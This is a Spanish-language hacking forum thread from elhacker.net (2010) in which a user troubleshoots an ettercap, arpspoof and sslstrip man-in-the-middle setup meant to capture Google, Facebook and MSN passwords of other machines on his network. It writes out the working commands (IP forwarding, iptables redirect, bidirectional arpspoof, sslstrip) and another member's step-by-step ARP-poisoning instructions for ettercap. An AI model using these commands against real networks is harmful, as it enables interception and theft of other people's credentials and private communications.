elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Ettercap+Sslstrip
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Ettercap+Sslstrip  (Leído 21,736 veces)
Goshin

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Ettercap+Sslstrip
« en: 9 Marzo 2010, 21:30 pm »

Buenas posteo para ver si alguien puede echar un poco de luz a mi problema, he leido todos los posts sobre ettercap y sslstrip que hay en el foro he googleado y aun asi no he encontrado la causa de mi problema que a continuacion indico:
Router 192.168.2.1 Router Belkinip
Pc del escaneo 192.168.2.10
Estoy intentando capturar las contraseñas de google,facebook,msn.... de mi red con Ettercap y sslstrip lo que hago es:
En una Terminal:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Segundo terminal:
arpspoof -i eth1-t 192.168.2.10 192.168.2.1
Tercer terminal:
python sslstrip.py -a
Cuarto terminal:
ettercap -T -q -i eth1

Lo que me da el ettercap es lo sigiente:
DHCP: [00:22:75:8E:XX:XX] REQUEST 192.168.2.10
DHCP: [192.168.2.1] ACK : 192.168.2.10 255.255.255.0 GW 192.168.2.1 DNS 192.168.2.1 "Belkin"

Entonces nose si es por el DHCP o por otra cosa he desactivado el firewall del router y sige igual, tambien he provado a usar el ARP Spoof del ettercap y nada.... Espero que alguien pueda ayudarme o darme una pista. mil gracias

« Última modificación: 9 Marzo 2010, 22:48 pm por Goshin » En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #1 en: 9 Marzo 2010, 22:35 pm »

hombre, es que lo de hacerte un MiM a ti mismo... es un poco raro cuanto menos!

prueba a hacerlo en un par de VM
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Goshin

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #2 en: 9 Marzo 2010, 22:46 pm »

Mil perdones la ip 192.168.2.10 es otro pc que tengo en la red, lo he provado con otro pc mas y lo mismo(modifico el post original, es que estaba mi novia al lado hablandome y no me fije)
Muchas gracias por responderme Kamsky de verdad
« Última modificación: 9 Marzo 2010, 22:50 pm por Goshin » En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #3 en: 9 Marzo 2010, 23:05 pm »

tienes que hacer el MiM completo, sólo lo estás haciendo en un sentido de la conexión
ya que usas ettercap para capturar tráfico, úsalo también para hacer el Arp Poisoning
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Goshin

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #4 en: 9 Marzo 2010, 23:13 pm »

Gracias por responderme si te refieres a :
terminal1 : arpspoof -i eth1-t 192.168.2.10 192.168.2.1
terminal2 : arpspoof -i eth1-t 192.168.2.1 192.168.2.10
ya lo he probado , supongo que te refieres a eso, y no he tenido ningun resultado
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #5 en: 9 Marzo 2010, 23:21 pm »

vamos por partes, primero olvídate del sslstrip y consigue que funcione el MiM, hazlo con ettercap
# sudo ettercap -C
Sniff -> Unified Sniffing-> tu tarjeta de red
Hosts->Scan for Hosts
Hosts-> Hosts List -> seleccionas la víctima con el 1, y el router con el 2
Mitm->Arp Poisoning-> remote
Start->Start Sniffing

una vez hecho esto, navega , manda mails o lo que sea pero en páginas no seguras, te debería de capturar todo...
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Goshin

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #6 en: 9 Marzo 2010, 23:38 pm »

Primero de todo gracias por dedicarme tu tiempo y tu ayuda.
lo que me comentas lo he probado y sale el mismo mensaje. En principio captura paquetes y veo conexiones de msn y facebook en View> Connections pero en User messages me sale lo que comente:
DHCP: [00:22:75:8E:XX:XX] REQUEST 192.168.2.10
DHCP: [192.168.2.1] ACK : 192.168.2.10 255.255.255.0 GW 192.168.2.1 DNS 192.168.2.1 "Belkin"
sinceramente nose que puede ser, de doy otra vez las gracias por ayudarme en este asunto
Edito:Los paquetes que veo de msn, facebook se ven al ver los paquetes pero no se pueden leer ni conversacions ni pass ni nada como mucho alguna cuenta de msn tipo xxxx@hotmail.com
« Última modificación: 9 Marzo 2010, 23:40 pm por Goshin » En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #7 en: 10 Marzo 2010, 21:38 pm »

asegurate de que se haya hecho bien el arp poisoning, mira la tabla arp en la víctima a ver si tiene la misma dirección MAC para tu IP y la del router
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Goshin

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #8 en: 10 Marzo 2010, 22:54 pm »

Hm las direccion MAC no cambian , cada uno tiene su direccion mac respectiva O_o en principio mi direccion mac y la del pc a escanear tendrian que ser iguales , no?
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Ettercap+Sslstrip
« Respuesta #9 en: 10 Marzo 2010, 23:20 pm »

en la Víctima tienen que corresponder las MACS del router con la tuya, de forma que cuando este Pc mande datos al router, en realidad te los esté mandando a tí, que los retransmites al router verdadero (por esto la necesidad de activar el forwarding), y en el sentido contrario pues lo mismo, si no sucede esto es que no se está haciendo correctamente el arp poisoning
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
HOW TO: Sniffing en Linux (Ettercap+SSLstrip+Driftnet) « 1 2 3 »
Hacking
mrfloffy 28 48,533 Último mensaje 31 Julio 2011, 16:44 pm
por necoreitor
Scrip para Sniffear pass y datos sobre lan/wlan con ettercap, sslstrip, urlsnarf
Hacking
r00ty 0 6,776 Último mensaje 1 Diciembre 2010, 06:31 am
por r00ty
ayuda ettercap+sslstrip
Hacking
wampis 3 5,993 Último mensaje 22 Septiembre 2011, 10:17 am
por ChimoC
sslstrip en wifiway 2.0.2
Wireless en Linux
valdomero 1 3,710 Último mensaje 23 Marzo 2011, 23:07 pm
por valdomero
Mitm con ettercap + sslstrip en VM Backtrack sobre Mac OS X
Hacking
astcorp 0 2,472 Último mensaje 13 Febrero 2014, 00:24 am
por astcorp
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines